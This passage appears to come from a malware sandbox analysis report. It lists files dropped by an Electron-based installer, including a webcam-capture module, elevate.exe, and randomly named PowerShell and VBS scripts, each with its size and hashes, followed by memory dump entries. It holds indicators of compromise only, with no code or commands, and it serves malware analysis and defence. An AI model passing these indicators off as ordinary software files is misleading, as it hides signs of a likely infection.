31dada843d0b4f9a66b184cb6d7b8b92

SHA1
0320b31981043c6e4c17470bf2ff4c7488553511

SHA256
457070b35c813175f5a7b630478073e478ff2bf23915dd3dc7a5b3b339cc2b0b

SHA512
c5b6ea595d3154fd9fe03f49a19f78eb4068718ce005b18a165d491459a290c29956b02a109ce2c314746773760c8e5c0d7064f384c65a572c78109f03538860

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\7z-out\locales\te.pak

Filesize
270KB

MD5
793a87d41cde6e6d1bb086284f69733b

SHA1
d887e3842b664f55b7308427aa6f5bf0b352d879

SHA256
5cdabd1ad41e8048f2cc6b1615e68b99159daa1aa6706b939447c1811bf0e255

SHA512
7c2e53baa387480eed45315bd9d53856ca46e5777ecdc9c29a0de7b0ad04beb6cbb8b5df0aa7c306395fda563037e06bea1ca70e433ce5a3ccc2ec184dfda972

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\7z-out\locales\th.pak

Filesize
227KB

MD5
43edd25f67ce6e6cea5373009ff0a1f8

SHA1
ed72ca6620cf23837e1334be50ccf616806bc5a2

SHA256
287897cf3df2db1cf59b872e6575ba8dfcaa0c1f68c17a9c91da6c4490adb8b0

SHA512
7160a72bd2e6b0ffa71e5d279995cc8be24a87cd9386eb29ab0eee79b8e607f5d824a11b6b4e3ef4c0f851a9d485a9642cb6adaa65c07933dca6e6f2c0052fc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\7z-out\locales\tr.pak

Filesize
117KB

MD5
40491896ad21543f339467186c5efb40

SHA1
695dde7cc35056dcbf0a533aff8299d4c6b61bd8

SHA256
43e99e132acaba88971b81a43531845dc7fc3a1e0794c3373de7d9a50a5655aa

SHA512
18d5ee9914849462e0b1bafd1ca216b29d0795e282ae0bdb354b15caf5c18f37f44fbd6f626b2cbb095e3398a6496de72e5b0d15621433979b5a589e34fac818

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\7z-out\locales\uk.pak

Filesize
198KB

MD5
d791b1ecf2931b2fb0c31aac170c7cdc

SHA1
02be115a9ff94fe5250651b6de4323eafc44fce1

SHA256
ffae6286d44c8e219ef90d411ad8746159a6ff8ea610e2a651147a3956696a22

SHA512
3a2edb8069e4a9734ce5e02b7c3de3c968c5bbc116f17f52f97e2bb2c78485c456c4f0cc952686c1aa17b7ee4d326a1dda698afafc63c79d842ca3905181a8da

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\7z-out\locales\vi.pak

Filesize
140KB

MD5
69c8796439192577f48bd249175aaf37

SHA1
97c52088ca69dada593db0e42b2135d264646454

SHA256
d7fdb53592de803a5fbcd8561c4918f1562f92fc8a3fd0039a2a1a7b76a8ecc2

SHA512
65eb7cb15291474ec7f9354775e59bcf334c90ddf3498ebd184e4c47118308421b2405bfa679e4b3a70ed1790e167c109fc2c72e89c3e31b5378cae975424144

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\7z-out\locales\zh-CN.pak

Filesize
101KB

MD5
098d656a4f4bd8240bed10e7678186c7

SHA1
0c19ab62b4262f1b51558e8aaa79e7741f73393a

SHA256
a55f568ad3a8854cec25699484f55024501c8a0967738ba694e073151e5981c7

SHA512
084538ce774233ca6d4393bb42239b0b85e11bd73dd19ba47e55796ca19848941b037510c0fca4ac08b4b2e0ccbc9b4ae72ef88a3e841738dd211961dc53c1e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\7z-out\locales\zh-TW.pak

Filesize
101KB

MD5
c2c35fcedc3708b5bcadf36587393002

SHA1
31d72402cbd44ceb921cedd806259c2cd14e411f

SHA256
cfe4c2c5eb131fd92e0d11f912714c5a9a048833ef3ffbe32679b3d58da8f8ac

SHA512
9ba3ea2d569d1d3ef09e94d7e66f843c8804368c4d016b6289e7dba002f7d2d50884a76c93eef879d87abcf8b36dd3e682b7bd3a18b2b5a969256cef672abf01

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\7z-out\resources.pak

Filesize
4.8MB

MD5
bdfa339e708ea0f23ed3620adc4a2d64

SHA1
82a95b7b022836b6e888f53e69386570c05a1af2

SHA256
b66ae9eda4543685974d35d051d967538bc57d55c2577629007c534ff330e1e4

SHA512
ba87c70e1b6446e0a7b62da33d72a36ff92ee54fda64343262bc26afa8166174e76d058ec6d707cdebf2611858b3b4b7e21798febec53da02febd81ade4ce8f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

Filesize
296KB

MD5
c20c205c6f8d70a5e1351a4041a3ec9f

SHA1
e1b2a763dd6c42439656e4e55aba0f3610ff3784

SHA256
bbcbb170242d9ff1b56680a80b1f8755df1135f9c714535ff3b3f575442f38dc

SHA512
dffd59d775dbb89cd886a2212fb9fe4cf0b2bdd7f2c00f8dc7c6b2287053b4971c8c6c033109ff1f90cdacea082e44d3c19fa76325d24976420c418218e701f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

Filesize
394B

MD5
067e233b0609d56ff4756bedd8c0efe0

SHA1
96419d05adc4b6674948b4ac14f8ab5bb3ce4380

SHA256
6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74

SHA512
94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

Filesize
24KB

MD5
471b15abc9f2e98fb7ed7361d3f045eb

SHA1
95b5798d80a9410872f6ed485ae2b43ca3745540

SHA256
7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004

SHA512
5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

Filesize
161KB

MD5
16a12bdc986207390dd79d658a6b2263

SHA1
b4b41f62cbc1e1ede786c6e30e11df8e61750bad

SHA256
50a8dd2f292bea9190204a42de067a34d5cbbec53746d40fe5b067fc85190bac

SHA512
d20394028c5d3ca46bb4879cac40da07b7d857f9a4a834bb4db4bd047f1a3265a80e1f7528244da6ee97c2f3e0cb5b2e51bc88eeb382a027939c2188e66dcdd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\7z-out\resources\elevate.exe

Filesize
105KB

MD5
792b92c8ad13c46f27c7ced0810694df

SHA1
d8d449b92de20a57df722df46435ba4553ecc802

SHA256
9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37

SHA512
6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\7z-out\snapshot_blob.bin

Filesize
342KB

MD5
c9ab741bbef53fa0e84952b8891a5f5a

SHA1
e2dcb8d034e07243537c86371de0c52bce62cee1

SHA256
4d82fe1e642fe3ca7ad1a173f806088c0652ecfe9f0f6f6e246066e15a3431d4

SHA512
177b98a3090ecfe4b4598dfcd7e8b3ca49efafba4dbd8d6c6d0def462de47c3fabfde831725622783ddc177de982de6115178d9bd9830d918bb544a5a4c27fc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\7z-out\swiftshader\libEGL.dll

Filesize
450KB

MD5
19dc9ee70e7765bb63a66b6826e8ecb7

SHA1
1a12f983f8b35cc2955d30657971f113c47dc164

SHA256
83d5719abee35e051d984510e1d5d9317a109031698814742b59bdbbe7d4e30f

SHA512
1fda2bcc4b2e70987ca6011ab2534007ae4f752016d29a588aaae839bb25c35e03773f220b6a8e926cf2643997e7d4c0f28743304269b2c55642ce12934def68

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\7z-out\swiftshader\libGLESv2.dll

Filesize
3.0MB

MD5
c0b36d56d83e601bf246f7709a8c5f9d

SHA1
b025a6070f7d61c7d1827856d2d4043834fd23f2

SHA256
45bb5e1f8dd87129ac0a75c78f8f29d06e3ac182a00fc5199b692068f1e05a53

SHA512
e429ae63bd8a7d5a936a638783511693e8fbbc91d97779b3d4dd3f0880f1c8a820106bfb57cf7ee6b3639f19165de87bbe127aadd81218689fc6c8fada2106d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\7z-out\v8_context_snapshot.bin

Filesize
656KB

MD5
47014c0f81bad6d216c617c9c63bf040

SHA1
7bb483fdc5fed3c6ed437d9fe6e5023bc38201bf

SHA256
e1249d05bfc73c645b27d269f47b6923b33a3cf8088a8ca78b3b637c90f58178

SHA512
052d86cf3305a9e493bd2472e6b7ddab5e0291efd6d899984a79bae46e5fa4bd21157e19ab4a2591c9cff9069de568bad18c7baf4f35d117c77134e635466f87

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\7z-out\vk_swiftshader.dll

Filesize
4.4MB

MD5
de2d91476e625278c30a5f69a1892e05

SHA1
4d707f6a801611fb437f5c1cba31b0909bf41506

SHA256
02c7f0b926c64f5a19a9aacd5f94ee00be4d576486592e18acc80c0a027b05ba

SHA512
d027407539346e5aedd527f5f71de45bace6295e96a7fbefbf273c930d64a791e488e4bdf6ef8db61fc19c80cac52a6e398c2973499c6fedb1e422c3ba71f532

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\7z-out\vk_swiftshader_icd.json

Filesize
106B

MD5
8642dd3a87e2de6e991fae08458e302b

SHA1
9c06735c31cec00600fd763a92f8112d085bd12a

SHA256
32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9

SHA512
f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\7z-out\vulkan-1.dll

Filesize
819KB

MD5
b91586bd80e057a7f62bdc4422744812

SHA1
a1df644421ece2e740e5bf0ed98b4f269fd85c39

SHA256
8ba72d98e0f78b77bda7816cd7232809d287310d34e0f1d7472b9d5fda2c6d02

SHA512
94f0a8e3e75e4803891c0fcb257052dbe0e7399772fc7a46ab802629f76ee580ed30b3678fa6bc3744c12cf9f3103bbc8276e88f6711278748148e9fbeef2053

Download Submit
C:\Users\Admin\AppData\Local\Temp\wyEKAb51ImWD_temp.ps1

Filesize
727B

MD5
38547e1e6069a3a9f35e5dee0a2e30aa

SHA1
ffd273a995dd7e7d40afa210d6fbe193403957cf

SHA256
931f1d0f7e15ff7780dbc7a81933be880e9512e92b2ddd7669d6fa74420b29c3

SHA512
03f94a7fd6bb6ed2070cc175860feb3876f3b5eb71305e916571ad7526d8bfbfb314d35d744c68f7769e035f2edfafbf52c50819696bac6e320fdc29d4c14f02

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
24de55b53be380a216ce93ed6f5c0eb5

SHA1
2b9aa98f937fec459b8db7e4e4f8a43586e40976

SHA256
bca53d404f131bba562a7a31f536e19b669e7b8fc1b57a9f685d672c66b3ff13

SHA512
c79e4f947da56d83562bb903c8494695f8a8361d7a76a815c80e81529324ad4665aa2d2a4792fdb57eb0b74e894cb3fd4ed44abf4c8a46663fe01d67039e493b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
5fba459c4ae509ee7682f92d42544419

SHA1
b5662f1ad357ec79fb707a1fbc9f7800fc457c43

SHA256
7c9ae9740e8f5e67a35fba4232e7eb8b71b28f6d6439d1cea79500620bcc914c

SHA512
f75402ade17a82404ddc5f00c63b56ead9bb25be02360fc39179709a050cf107368e1d80d64ec279a5ecb2895c20f1f2ddc4be21c1bf25c0597123ebfc89a92e

Download Submit
C:\Users\Admin\AppData\Roaming\WTKj8wKmiZc0.vbs

Filesize
144B

MD5
7a8252fd421626c9ac34dbc594449d52

SHA1
584fb7b5dc1e2aa3a8d180c66b1b8bcab40389b8

SHA256
0fb3049957c295cd5bcf19b431d8a1ecd2e48c462cff19fa77e430fd42b2c048

SHA512
c9fc8c0e20f67890ed50553502dd609c5b611ab85dc49624113e32847b8ec604e763ac0c212e27b3d03554723f045d51f6e782503157b45888b2ffbd16936729

Download Submit
\Users\Admin\AppData\Local\Temp\1c39e49a-f360-4220-9747-92f6b3908416.tmp.node

Filesize
643KB

MD5
7bb446b26e6da42fa1bf16e4aec09a5d

SHA1
508aabc385972640a47b22ee81eb075b824a04b5

SHA256
90be01ac92e77ed27c88b8b3a4472f24ffdb11bdce4141ffa8ec556600874049

SHA512
d0bcfd7bd071348e8350e8251003386abd40a15a6b4c21003cf76f084e88b9ab4df8776e0401cebebd8f29790e538266c2ee4c2258fd2ef99d358d3e9007c1ca

Download Submit
\Users\Admin\AppData\Local\Temp\4db5ac5c-4c7c-4c7c-a171-36a1b42cd0b5.tmp.node

Filesize
1.8MB

MD5
3072b68e3c226aff39e6782d025f25a8

SHA1
cf559196d74fa490ac8ce192db222c9f5c5a006a

SHA256
7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01

SHA512
61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61

Download Submit
\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\StdUtils.dll

Filesize
100KB

MD5
c6a6e03f77c313b267498515488c5740

SHA1
3d49fc2784b9450962ed6b82b46e9c3c957d7c15

SHA256
b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e

SHA512
9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

Download Submit
\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\System.dll

Filesize
12KB

MD5
0d7ad4f45dc6f5aa87f606d0331c6901

SHA1
48df0911f0484cbe2a8cdd5362140b63c41ee457

SHA256
3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca

SHA512
c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

Download Submit
\Users\Admin\AppData\Local\Temp\nsw7E39.tmp\nsis7z.dll

Filesize
424KB

MD5
80e44ce4895304c6a3a831310fbf8cd0

SHA1
36bd49ae21c460be5753a904b4501f1abca53508

SHA256
b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592

SHA512
c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

Download Submit
memory/520-581-0x00007FF80EE60000-0x00007FF80EE61000-memory.dmp

Filesize
4KB

Download
memory/1836-639-0x0000025364820000-0x0000025364896000-memory.dmp

Filesize
472KB

Download
memory/1836-635-0x0000025364670000-0x0000025364692000-memory.dmp

Filesize
136KB

Download